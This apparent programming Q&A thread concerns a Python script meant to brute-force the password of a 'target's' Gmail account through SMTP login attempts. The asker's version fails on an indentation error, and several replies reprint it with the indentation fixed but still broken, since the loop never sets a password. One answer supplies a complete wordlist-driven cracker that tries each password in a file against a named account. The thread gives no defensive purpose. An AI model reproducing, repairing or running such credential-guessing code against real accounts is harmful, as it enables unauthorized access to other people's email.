# A basic gmail BruteForce program in python

Tags: python, smtp, gmail

I am trying to figure out why isn't my code working. I am trying to improve my python skill by adding some code to another, but when I tried to execute it keeps giving me a syntax error.

```
import itertools 
import smtplib

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

user = raw_input("Enter Target's Gmail Address: ")
def print_perms(chars, minlen, maxlen): 
    for n in range(minlen, maxlen+1): 
        for perm in itertools.product(chars, repeat=n): 
            print(''.join(perm)) 

print_perms("abcdefghijklmnopqrstuvwxyz1234567890", 2, 4)

for symbols in print_perms:
    try:
        smtpserver.login(user, password)

        print "[+] Password Cracked: %s" % symbols
        break;
        except smtplib.SMTPAuthenticationError:
            print "[!] Password Inccorect: %s" % symbols
```

the output is

```
File "main.py", line 22                                                                                                                                                       
    except smtplib.SMTPAuthenticationError:                                                                                                                                     
         ^                                                                                                                                                                      
SyntaxError: invalid syntax
```

I just don't understand, may somebody discover and patch up the problem

Comment: Un-indent the `except` statement to match the indentation of the `try` statement.

Comment: Use any Python based IDE to check for indentation.

Answer (score 1):

Indentation!

`except` should be at the same indent level as `try`.

Answer (score 1):

try this script :

```
import sys
import smtplib
def main():

   host = 'smtp.gmail.com'
   port = 587
   user = raw_input('[+] Enter The Email To Crack : ')
   password = raw_input('[+] Enter The Password List : ')
   passs = open(password, 'r').readlines()
   for passw in passs:
       password = passw.rstrip()
       smtp(host, port, user, password)


def smtp(host, port, user, password):
    try:
       server = smtplib.SMTP(host, port)
       server.ehlo()
       server.starttls()
       server.login(user, password)
       print "[+] Password Found Succesfully : " + password
       sys.exit(1)
    except smtplib.SMTPAuthenticationError:
       print "[-] Password Incorrect : " + password
       pass
```

Answer (score 0):

You didn't intended the `except` according the rule. This is after fixing that. For more about `try...except` use see [here](https://docs.python.org/2/tutorial/errors.html).

```
import itertools 
import smtplib

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

user = raw_input("Enter Target's Gmail Address: ")
def print_perms(chars, minlen, maxlen): 
    for n in range(minlen, maxlen+1): 
        for perm in itertools.product(chars, repeat=n): 
            print(''.join(perm)) 

print_perms("abcdefghijklmnopqrstuvwxyz1234567890", 2, 4)

for symbols in print_perms:
    try:
        smtpserver.login(user, password)

        print "[+] Password Cracked: %s" % symbols
        break;
    except smtplib.SMTPAuthenticationError:
        print "[!] Password Inccorect: %s" % symbols
```

Comment: thnx do you think you can edit the code until it works

Comment: It did but it said it could not connect to the smtp server

Answer (score 0):

This worked for me:

```
import itertools 
import smtplib

smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()

user = input("Enter Target's Gmail Address: ")
def print_perms(chars, minlen, maxlen): 
    for n in range(minlen, maxlen+1): 
        for perm in itertools.product(chars, repeat=n): 
            print(''.join(perm)) 

print_perms("abcdefghijklmnopqrstuvwxyz1234567890", 2, 4)

for symbols in print_perms:
    try:
        smtpserver.login(user, password)

        print ("[+] Password Cracked: %s") % symbols
        break;
    except smtplib.SMTPAuthenticationError:
        print ("[!] Password Inccorect: %s") % symbols
```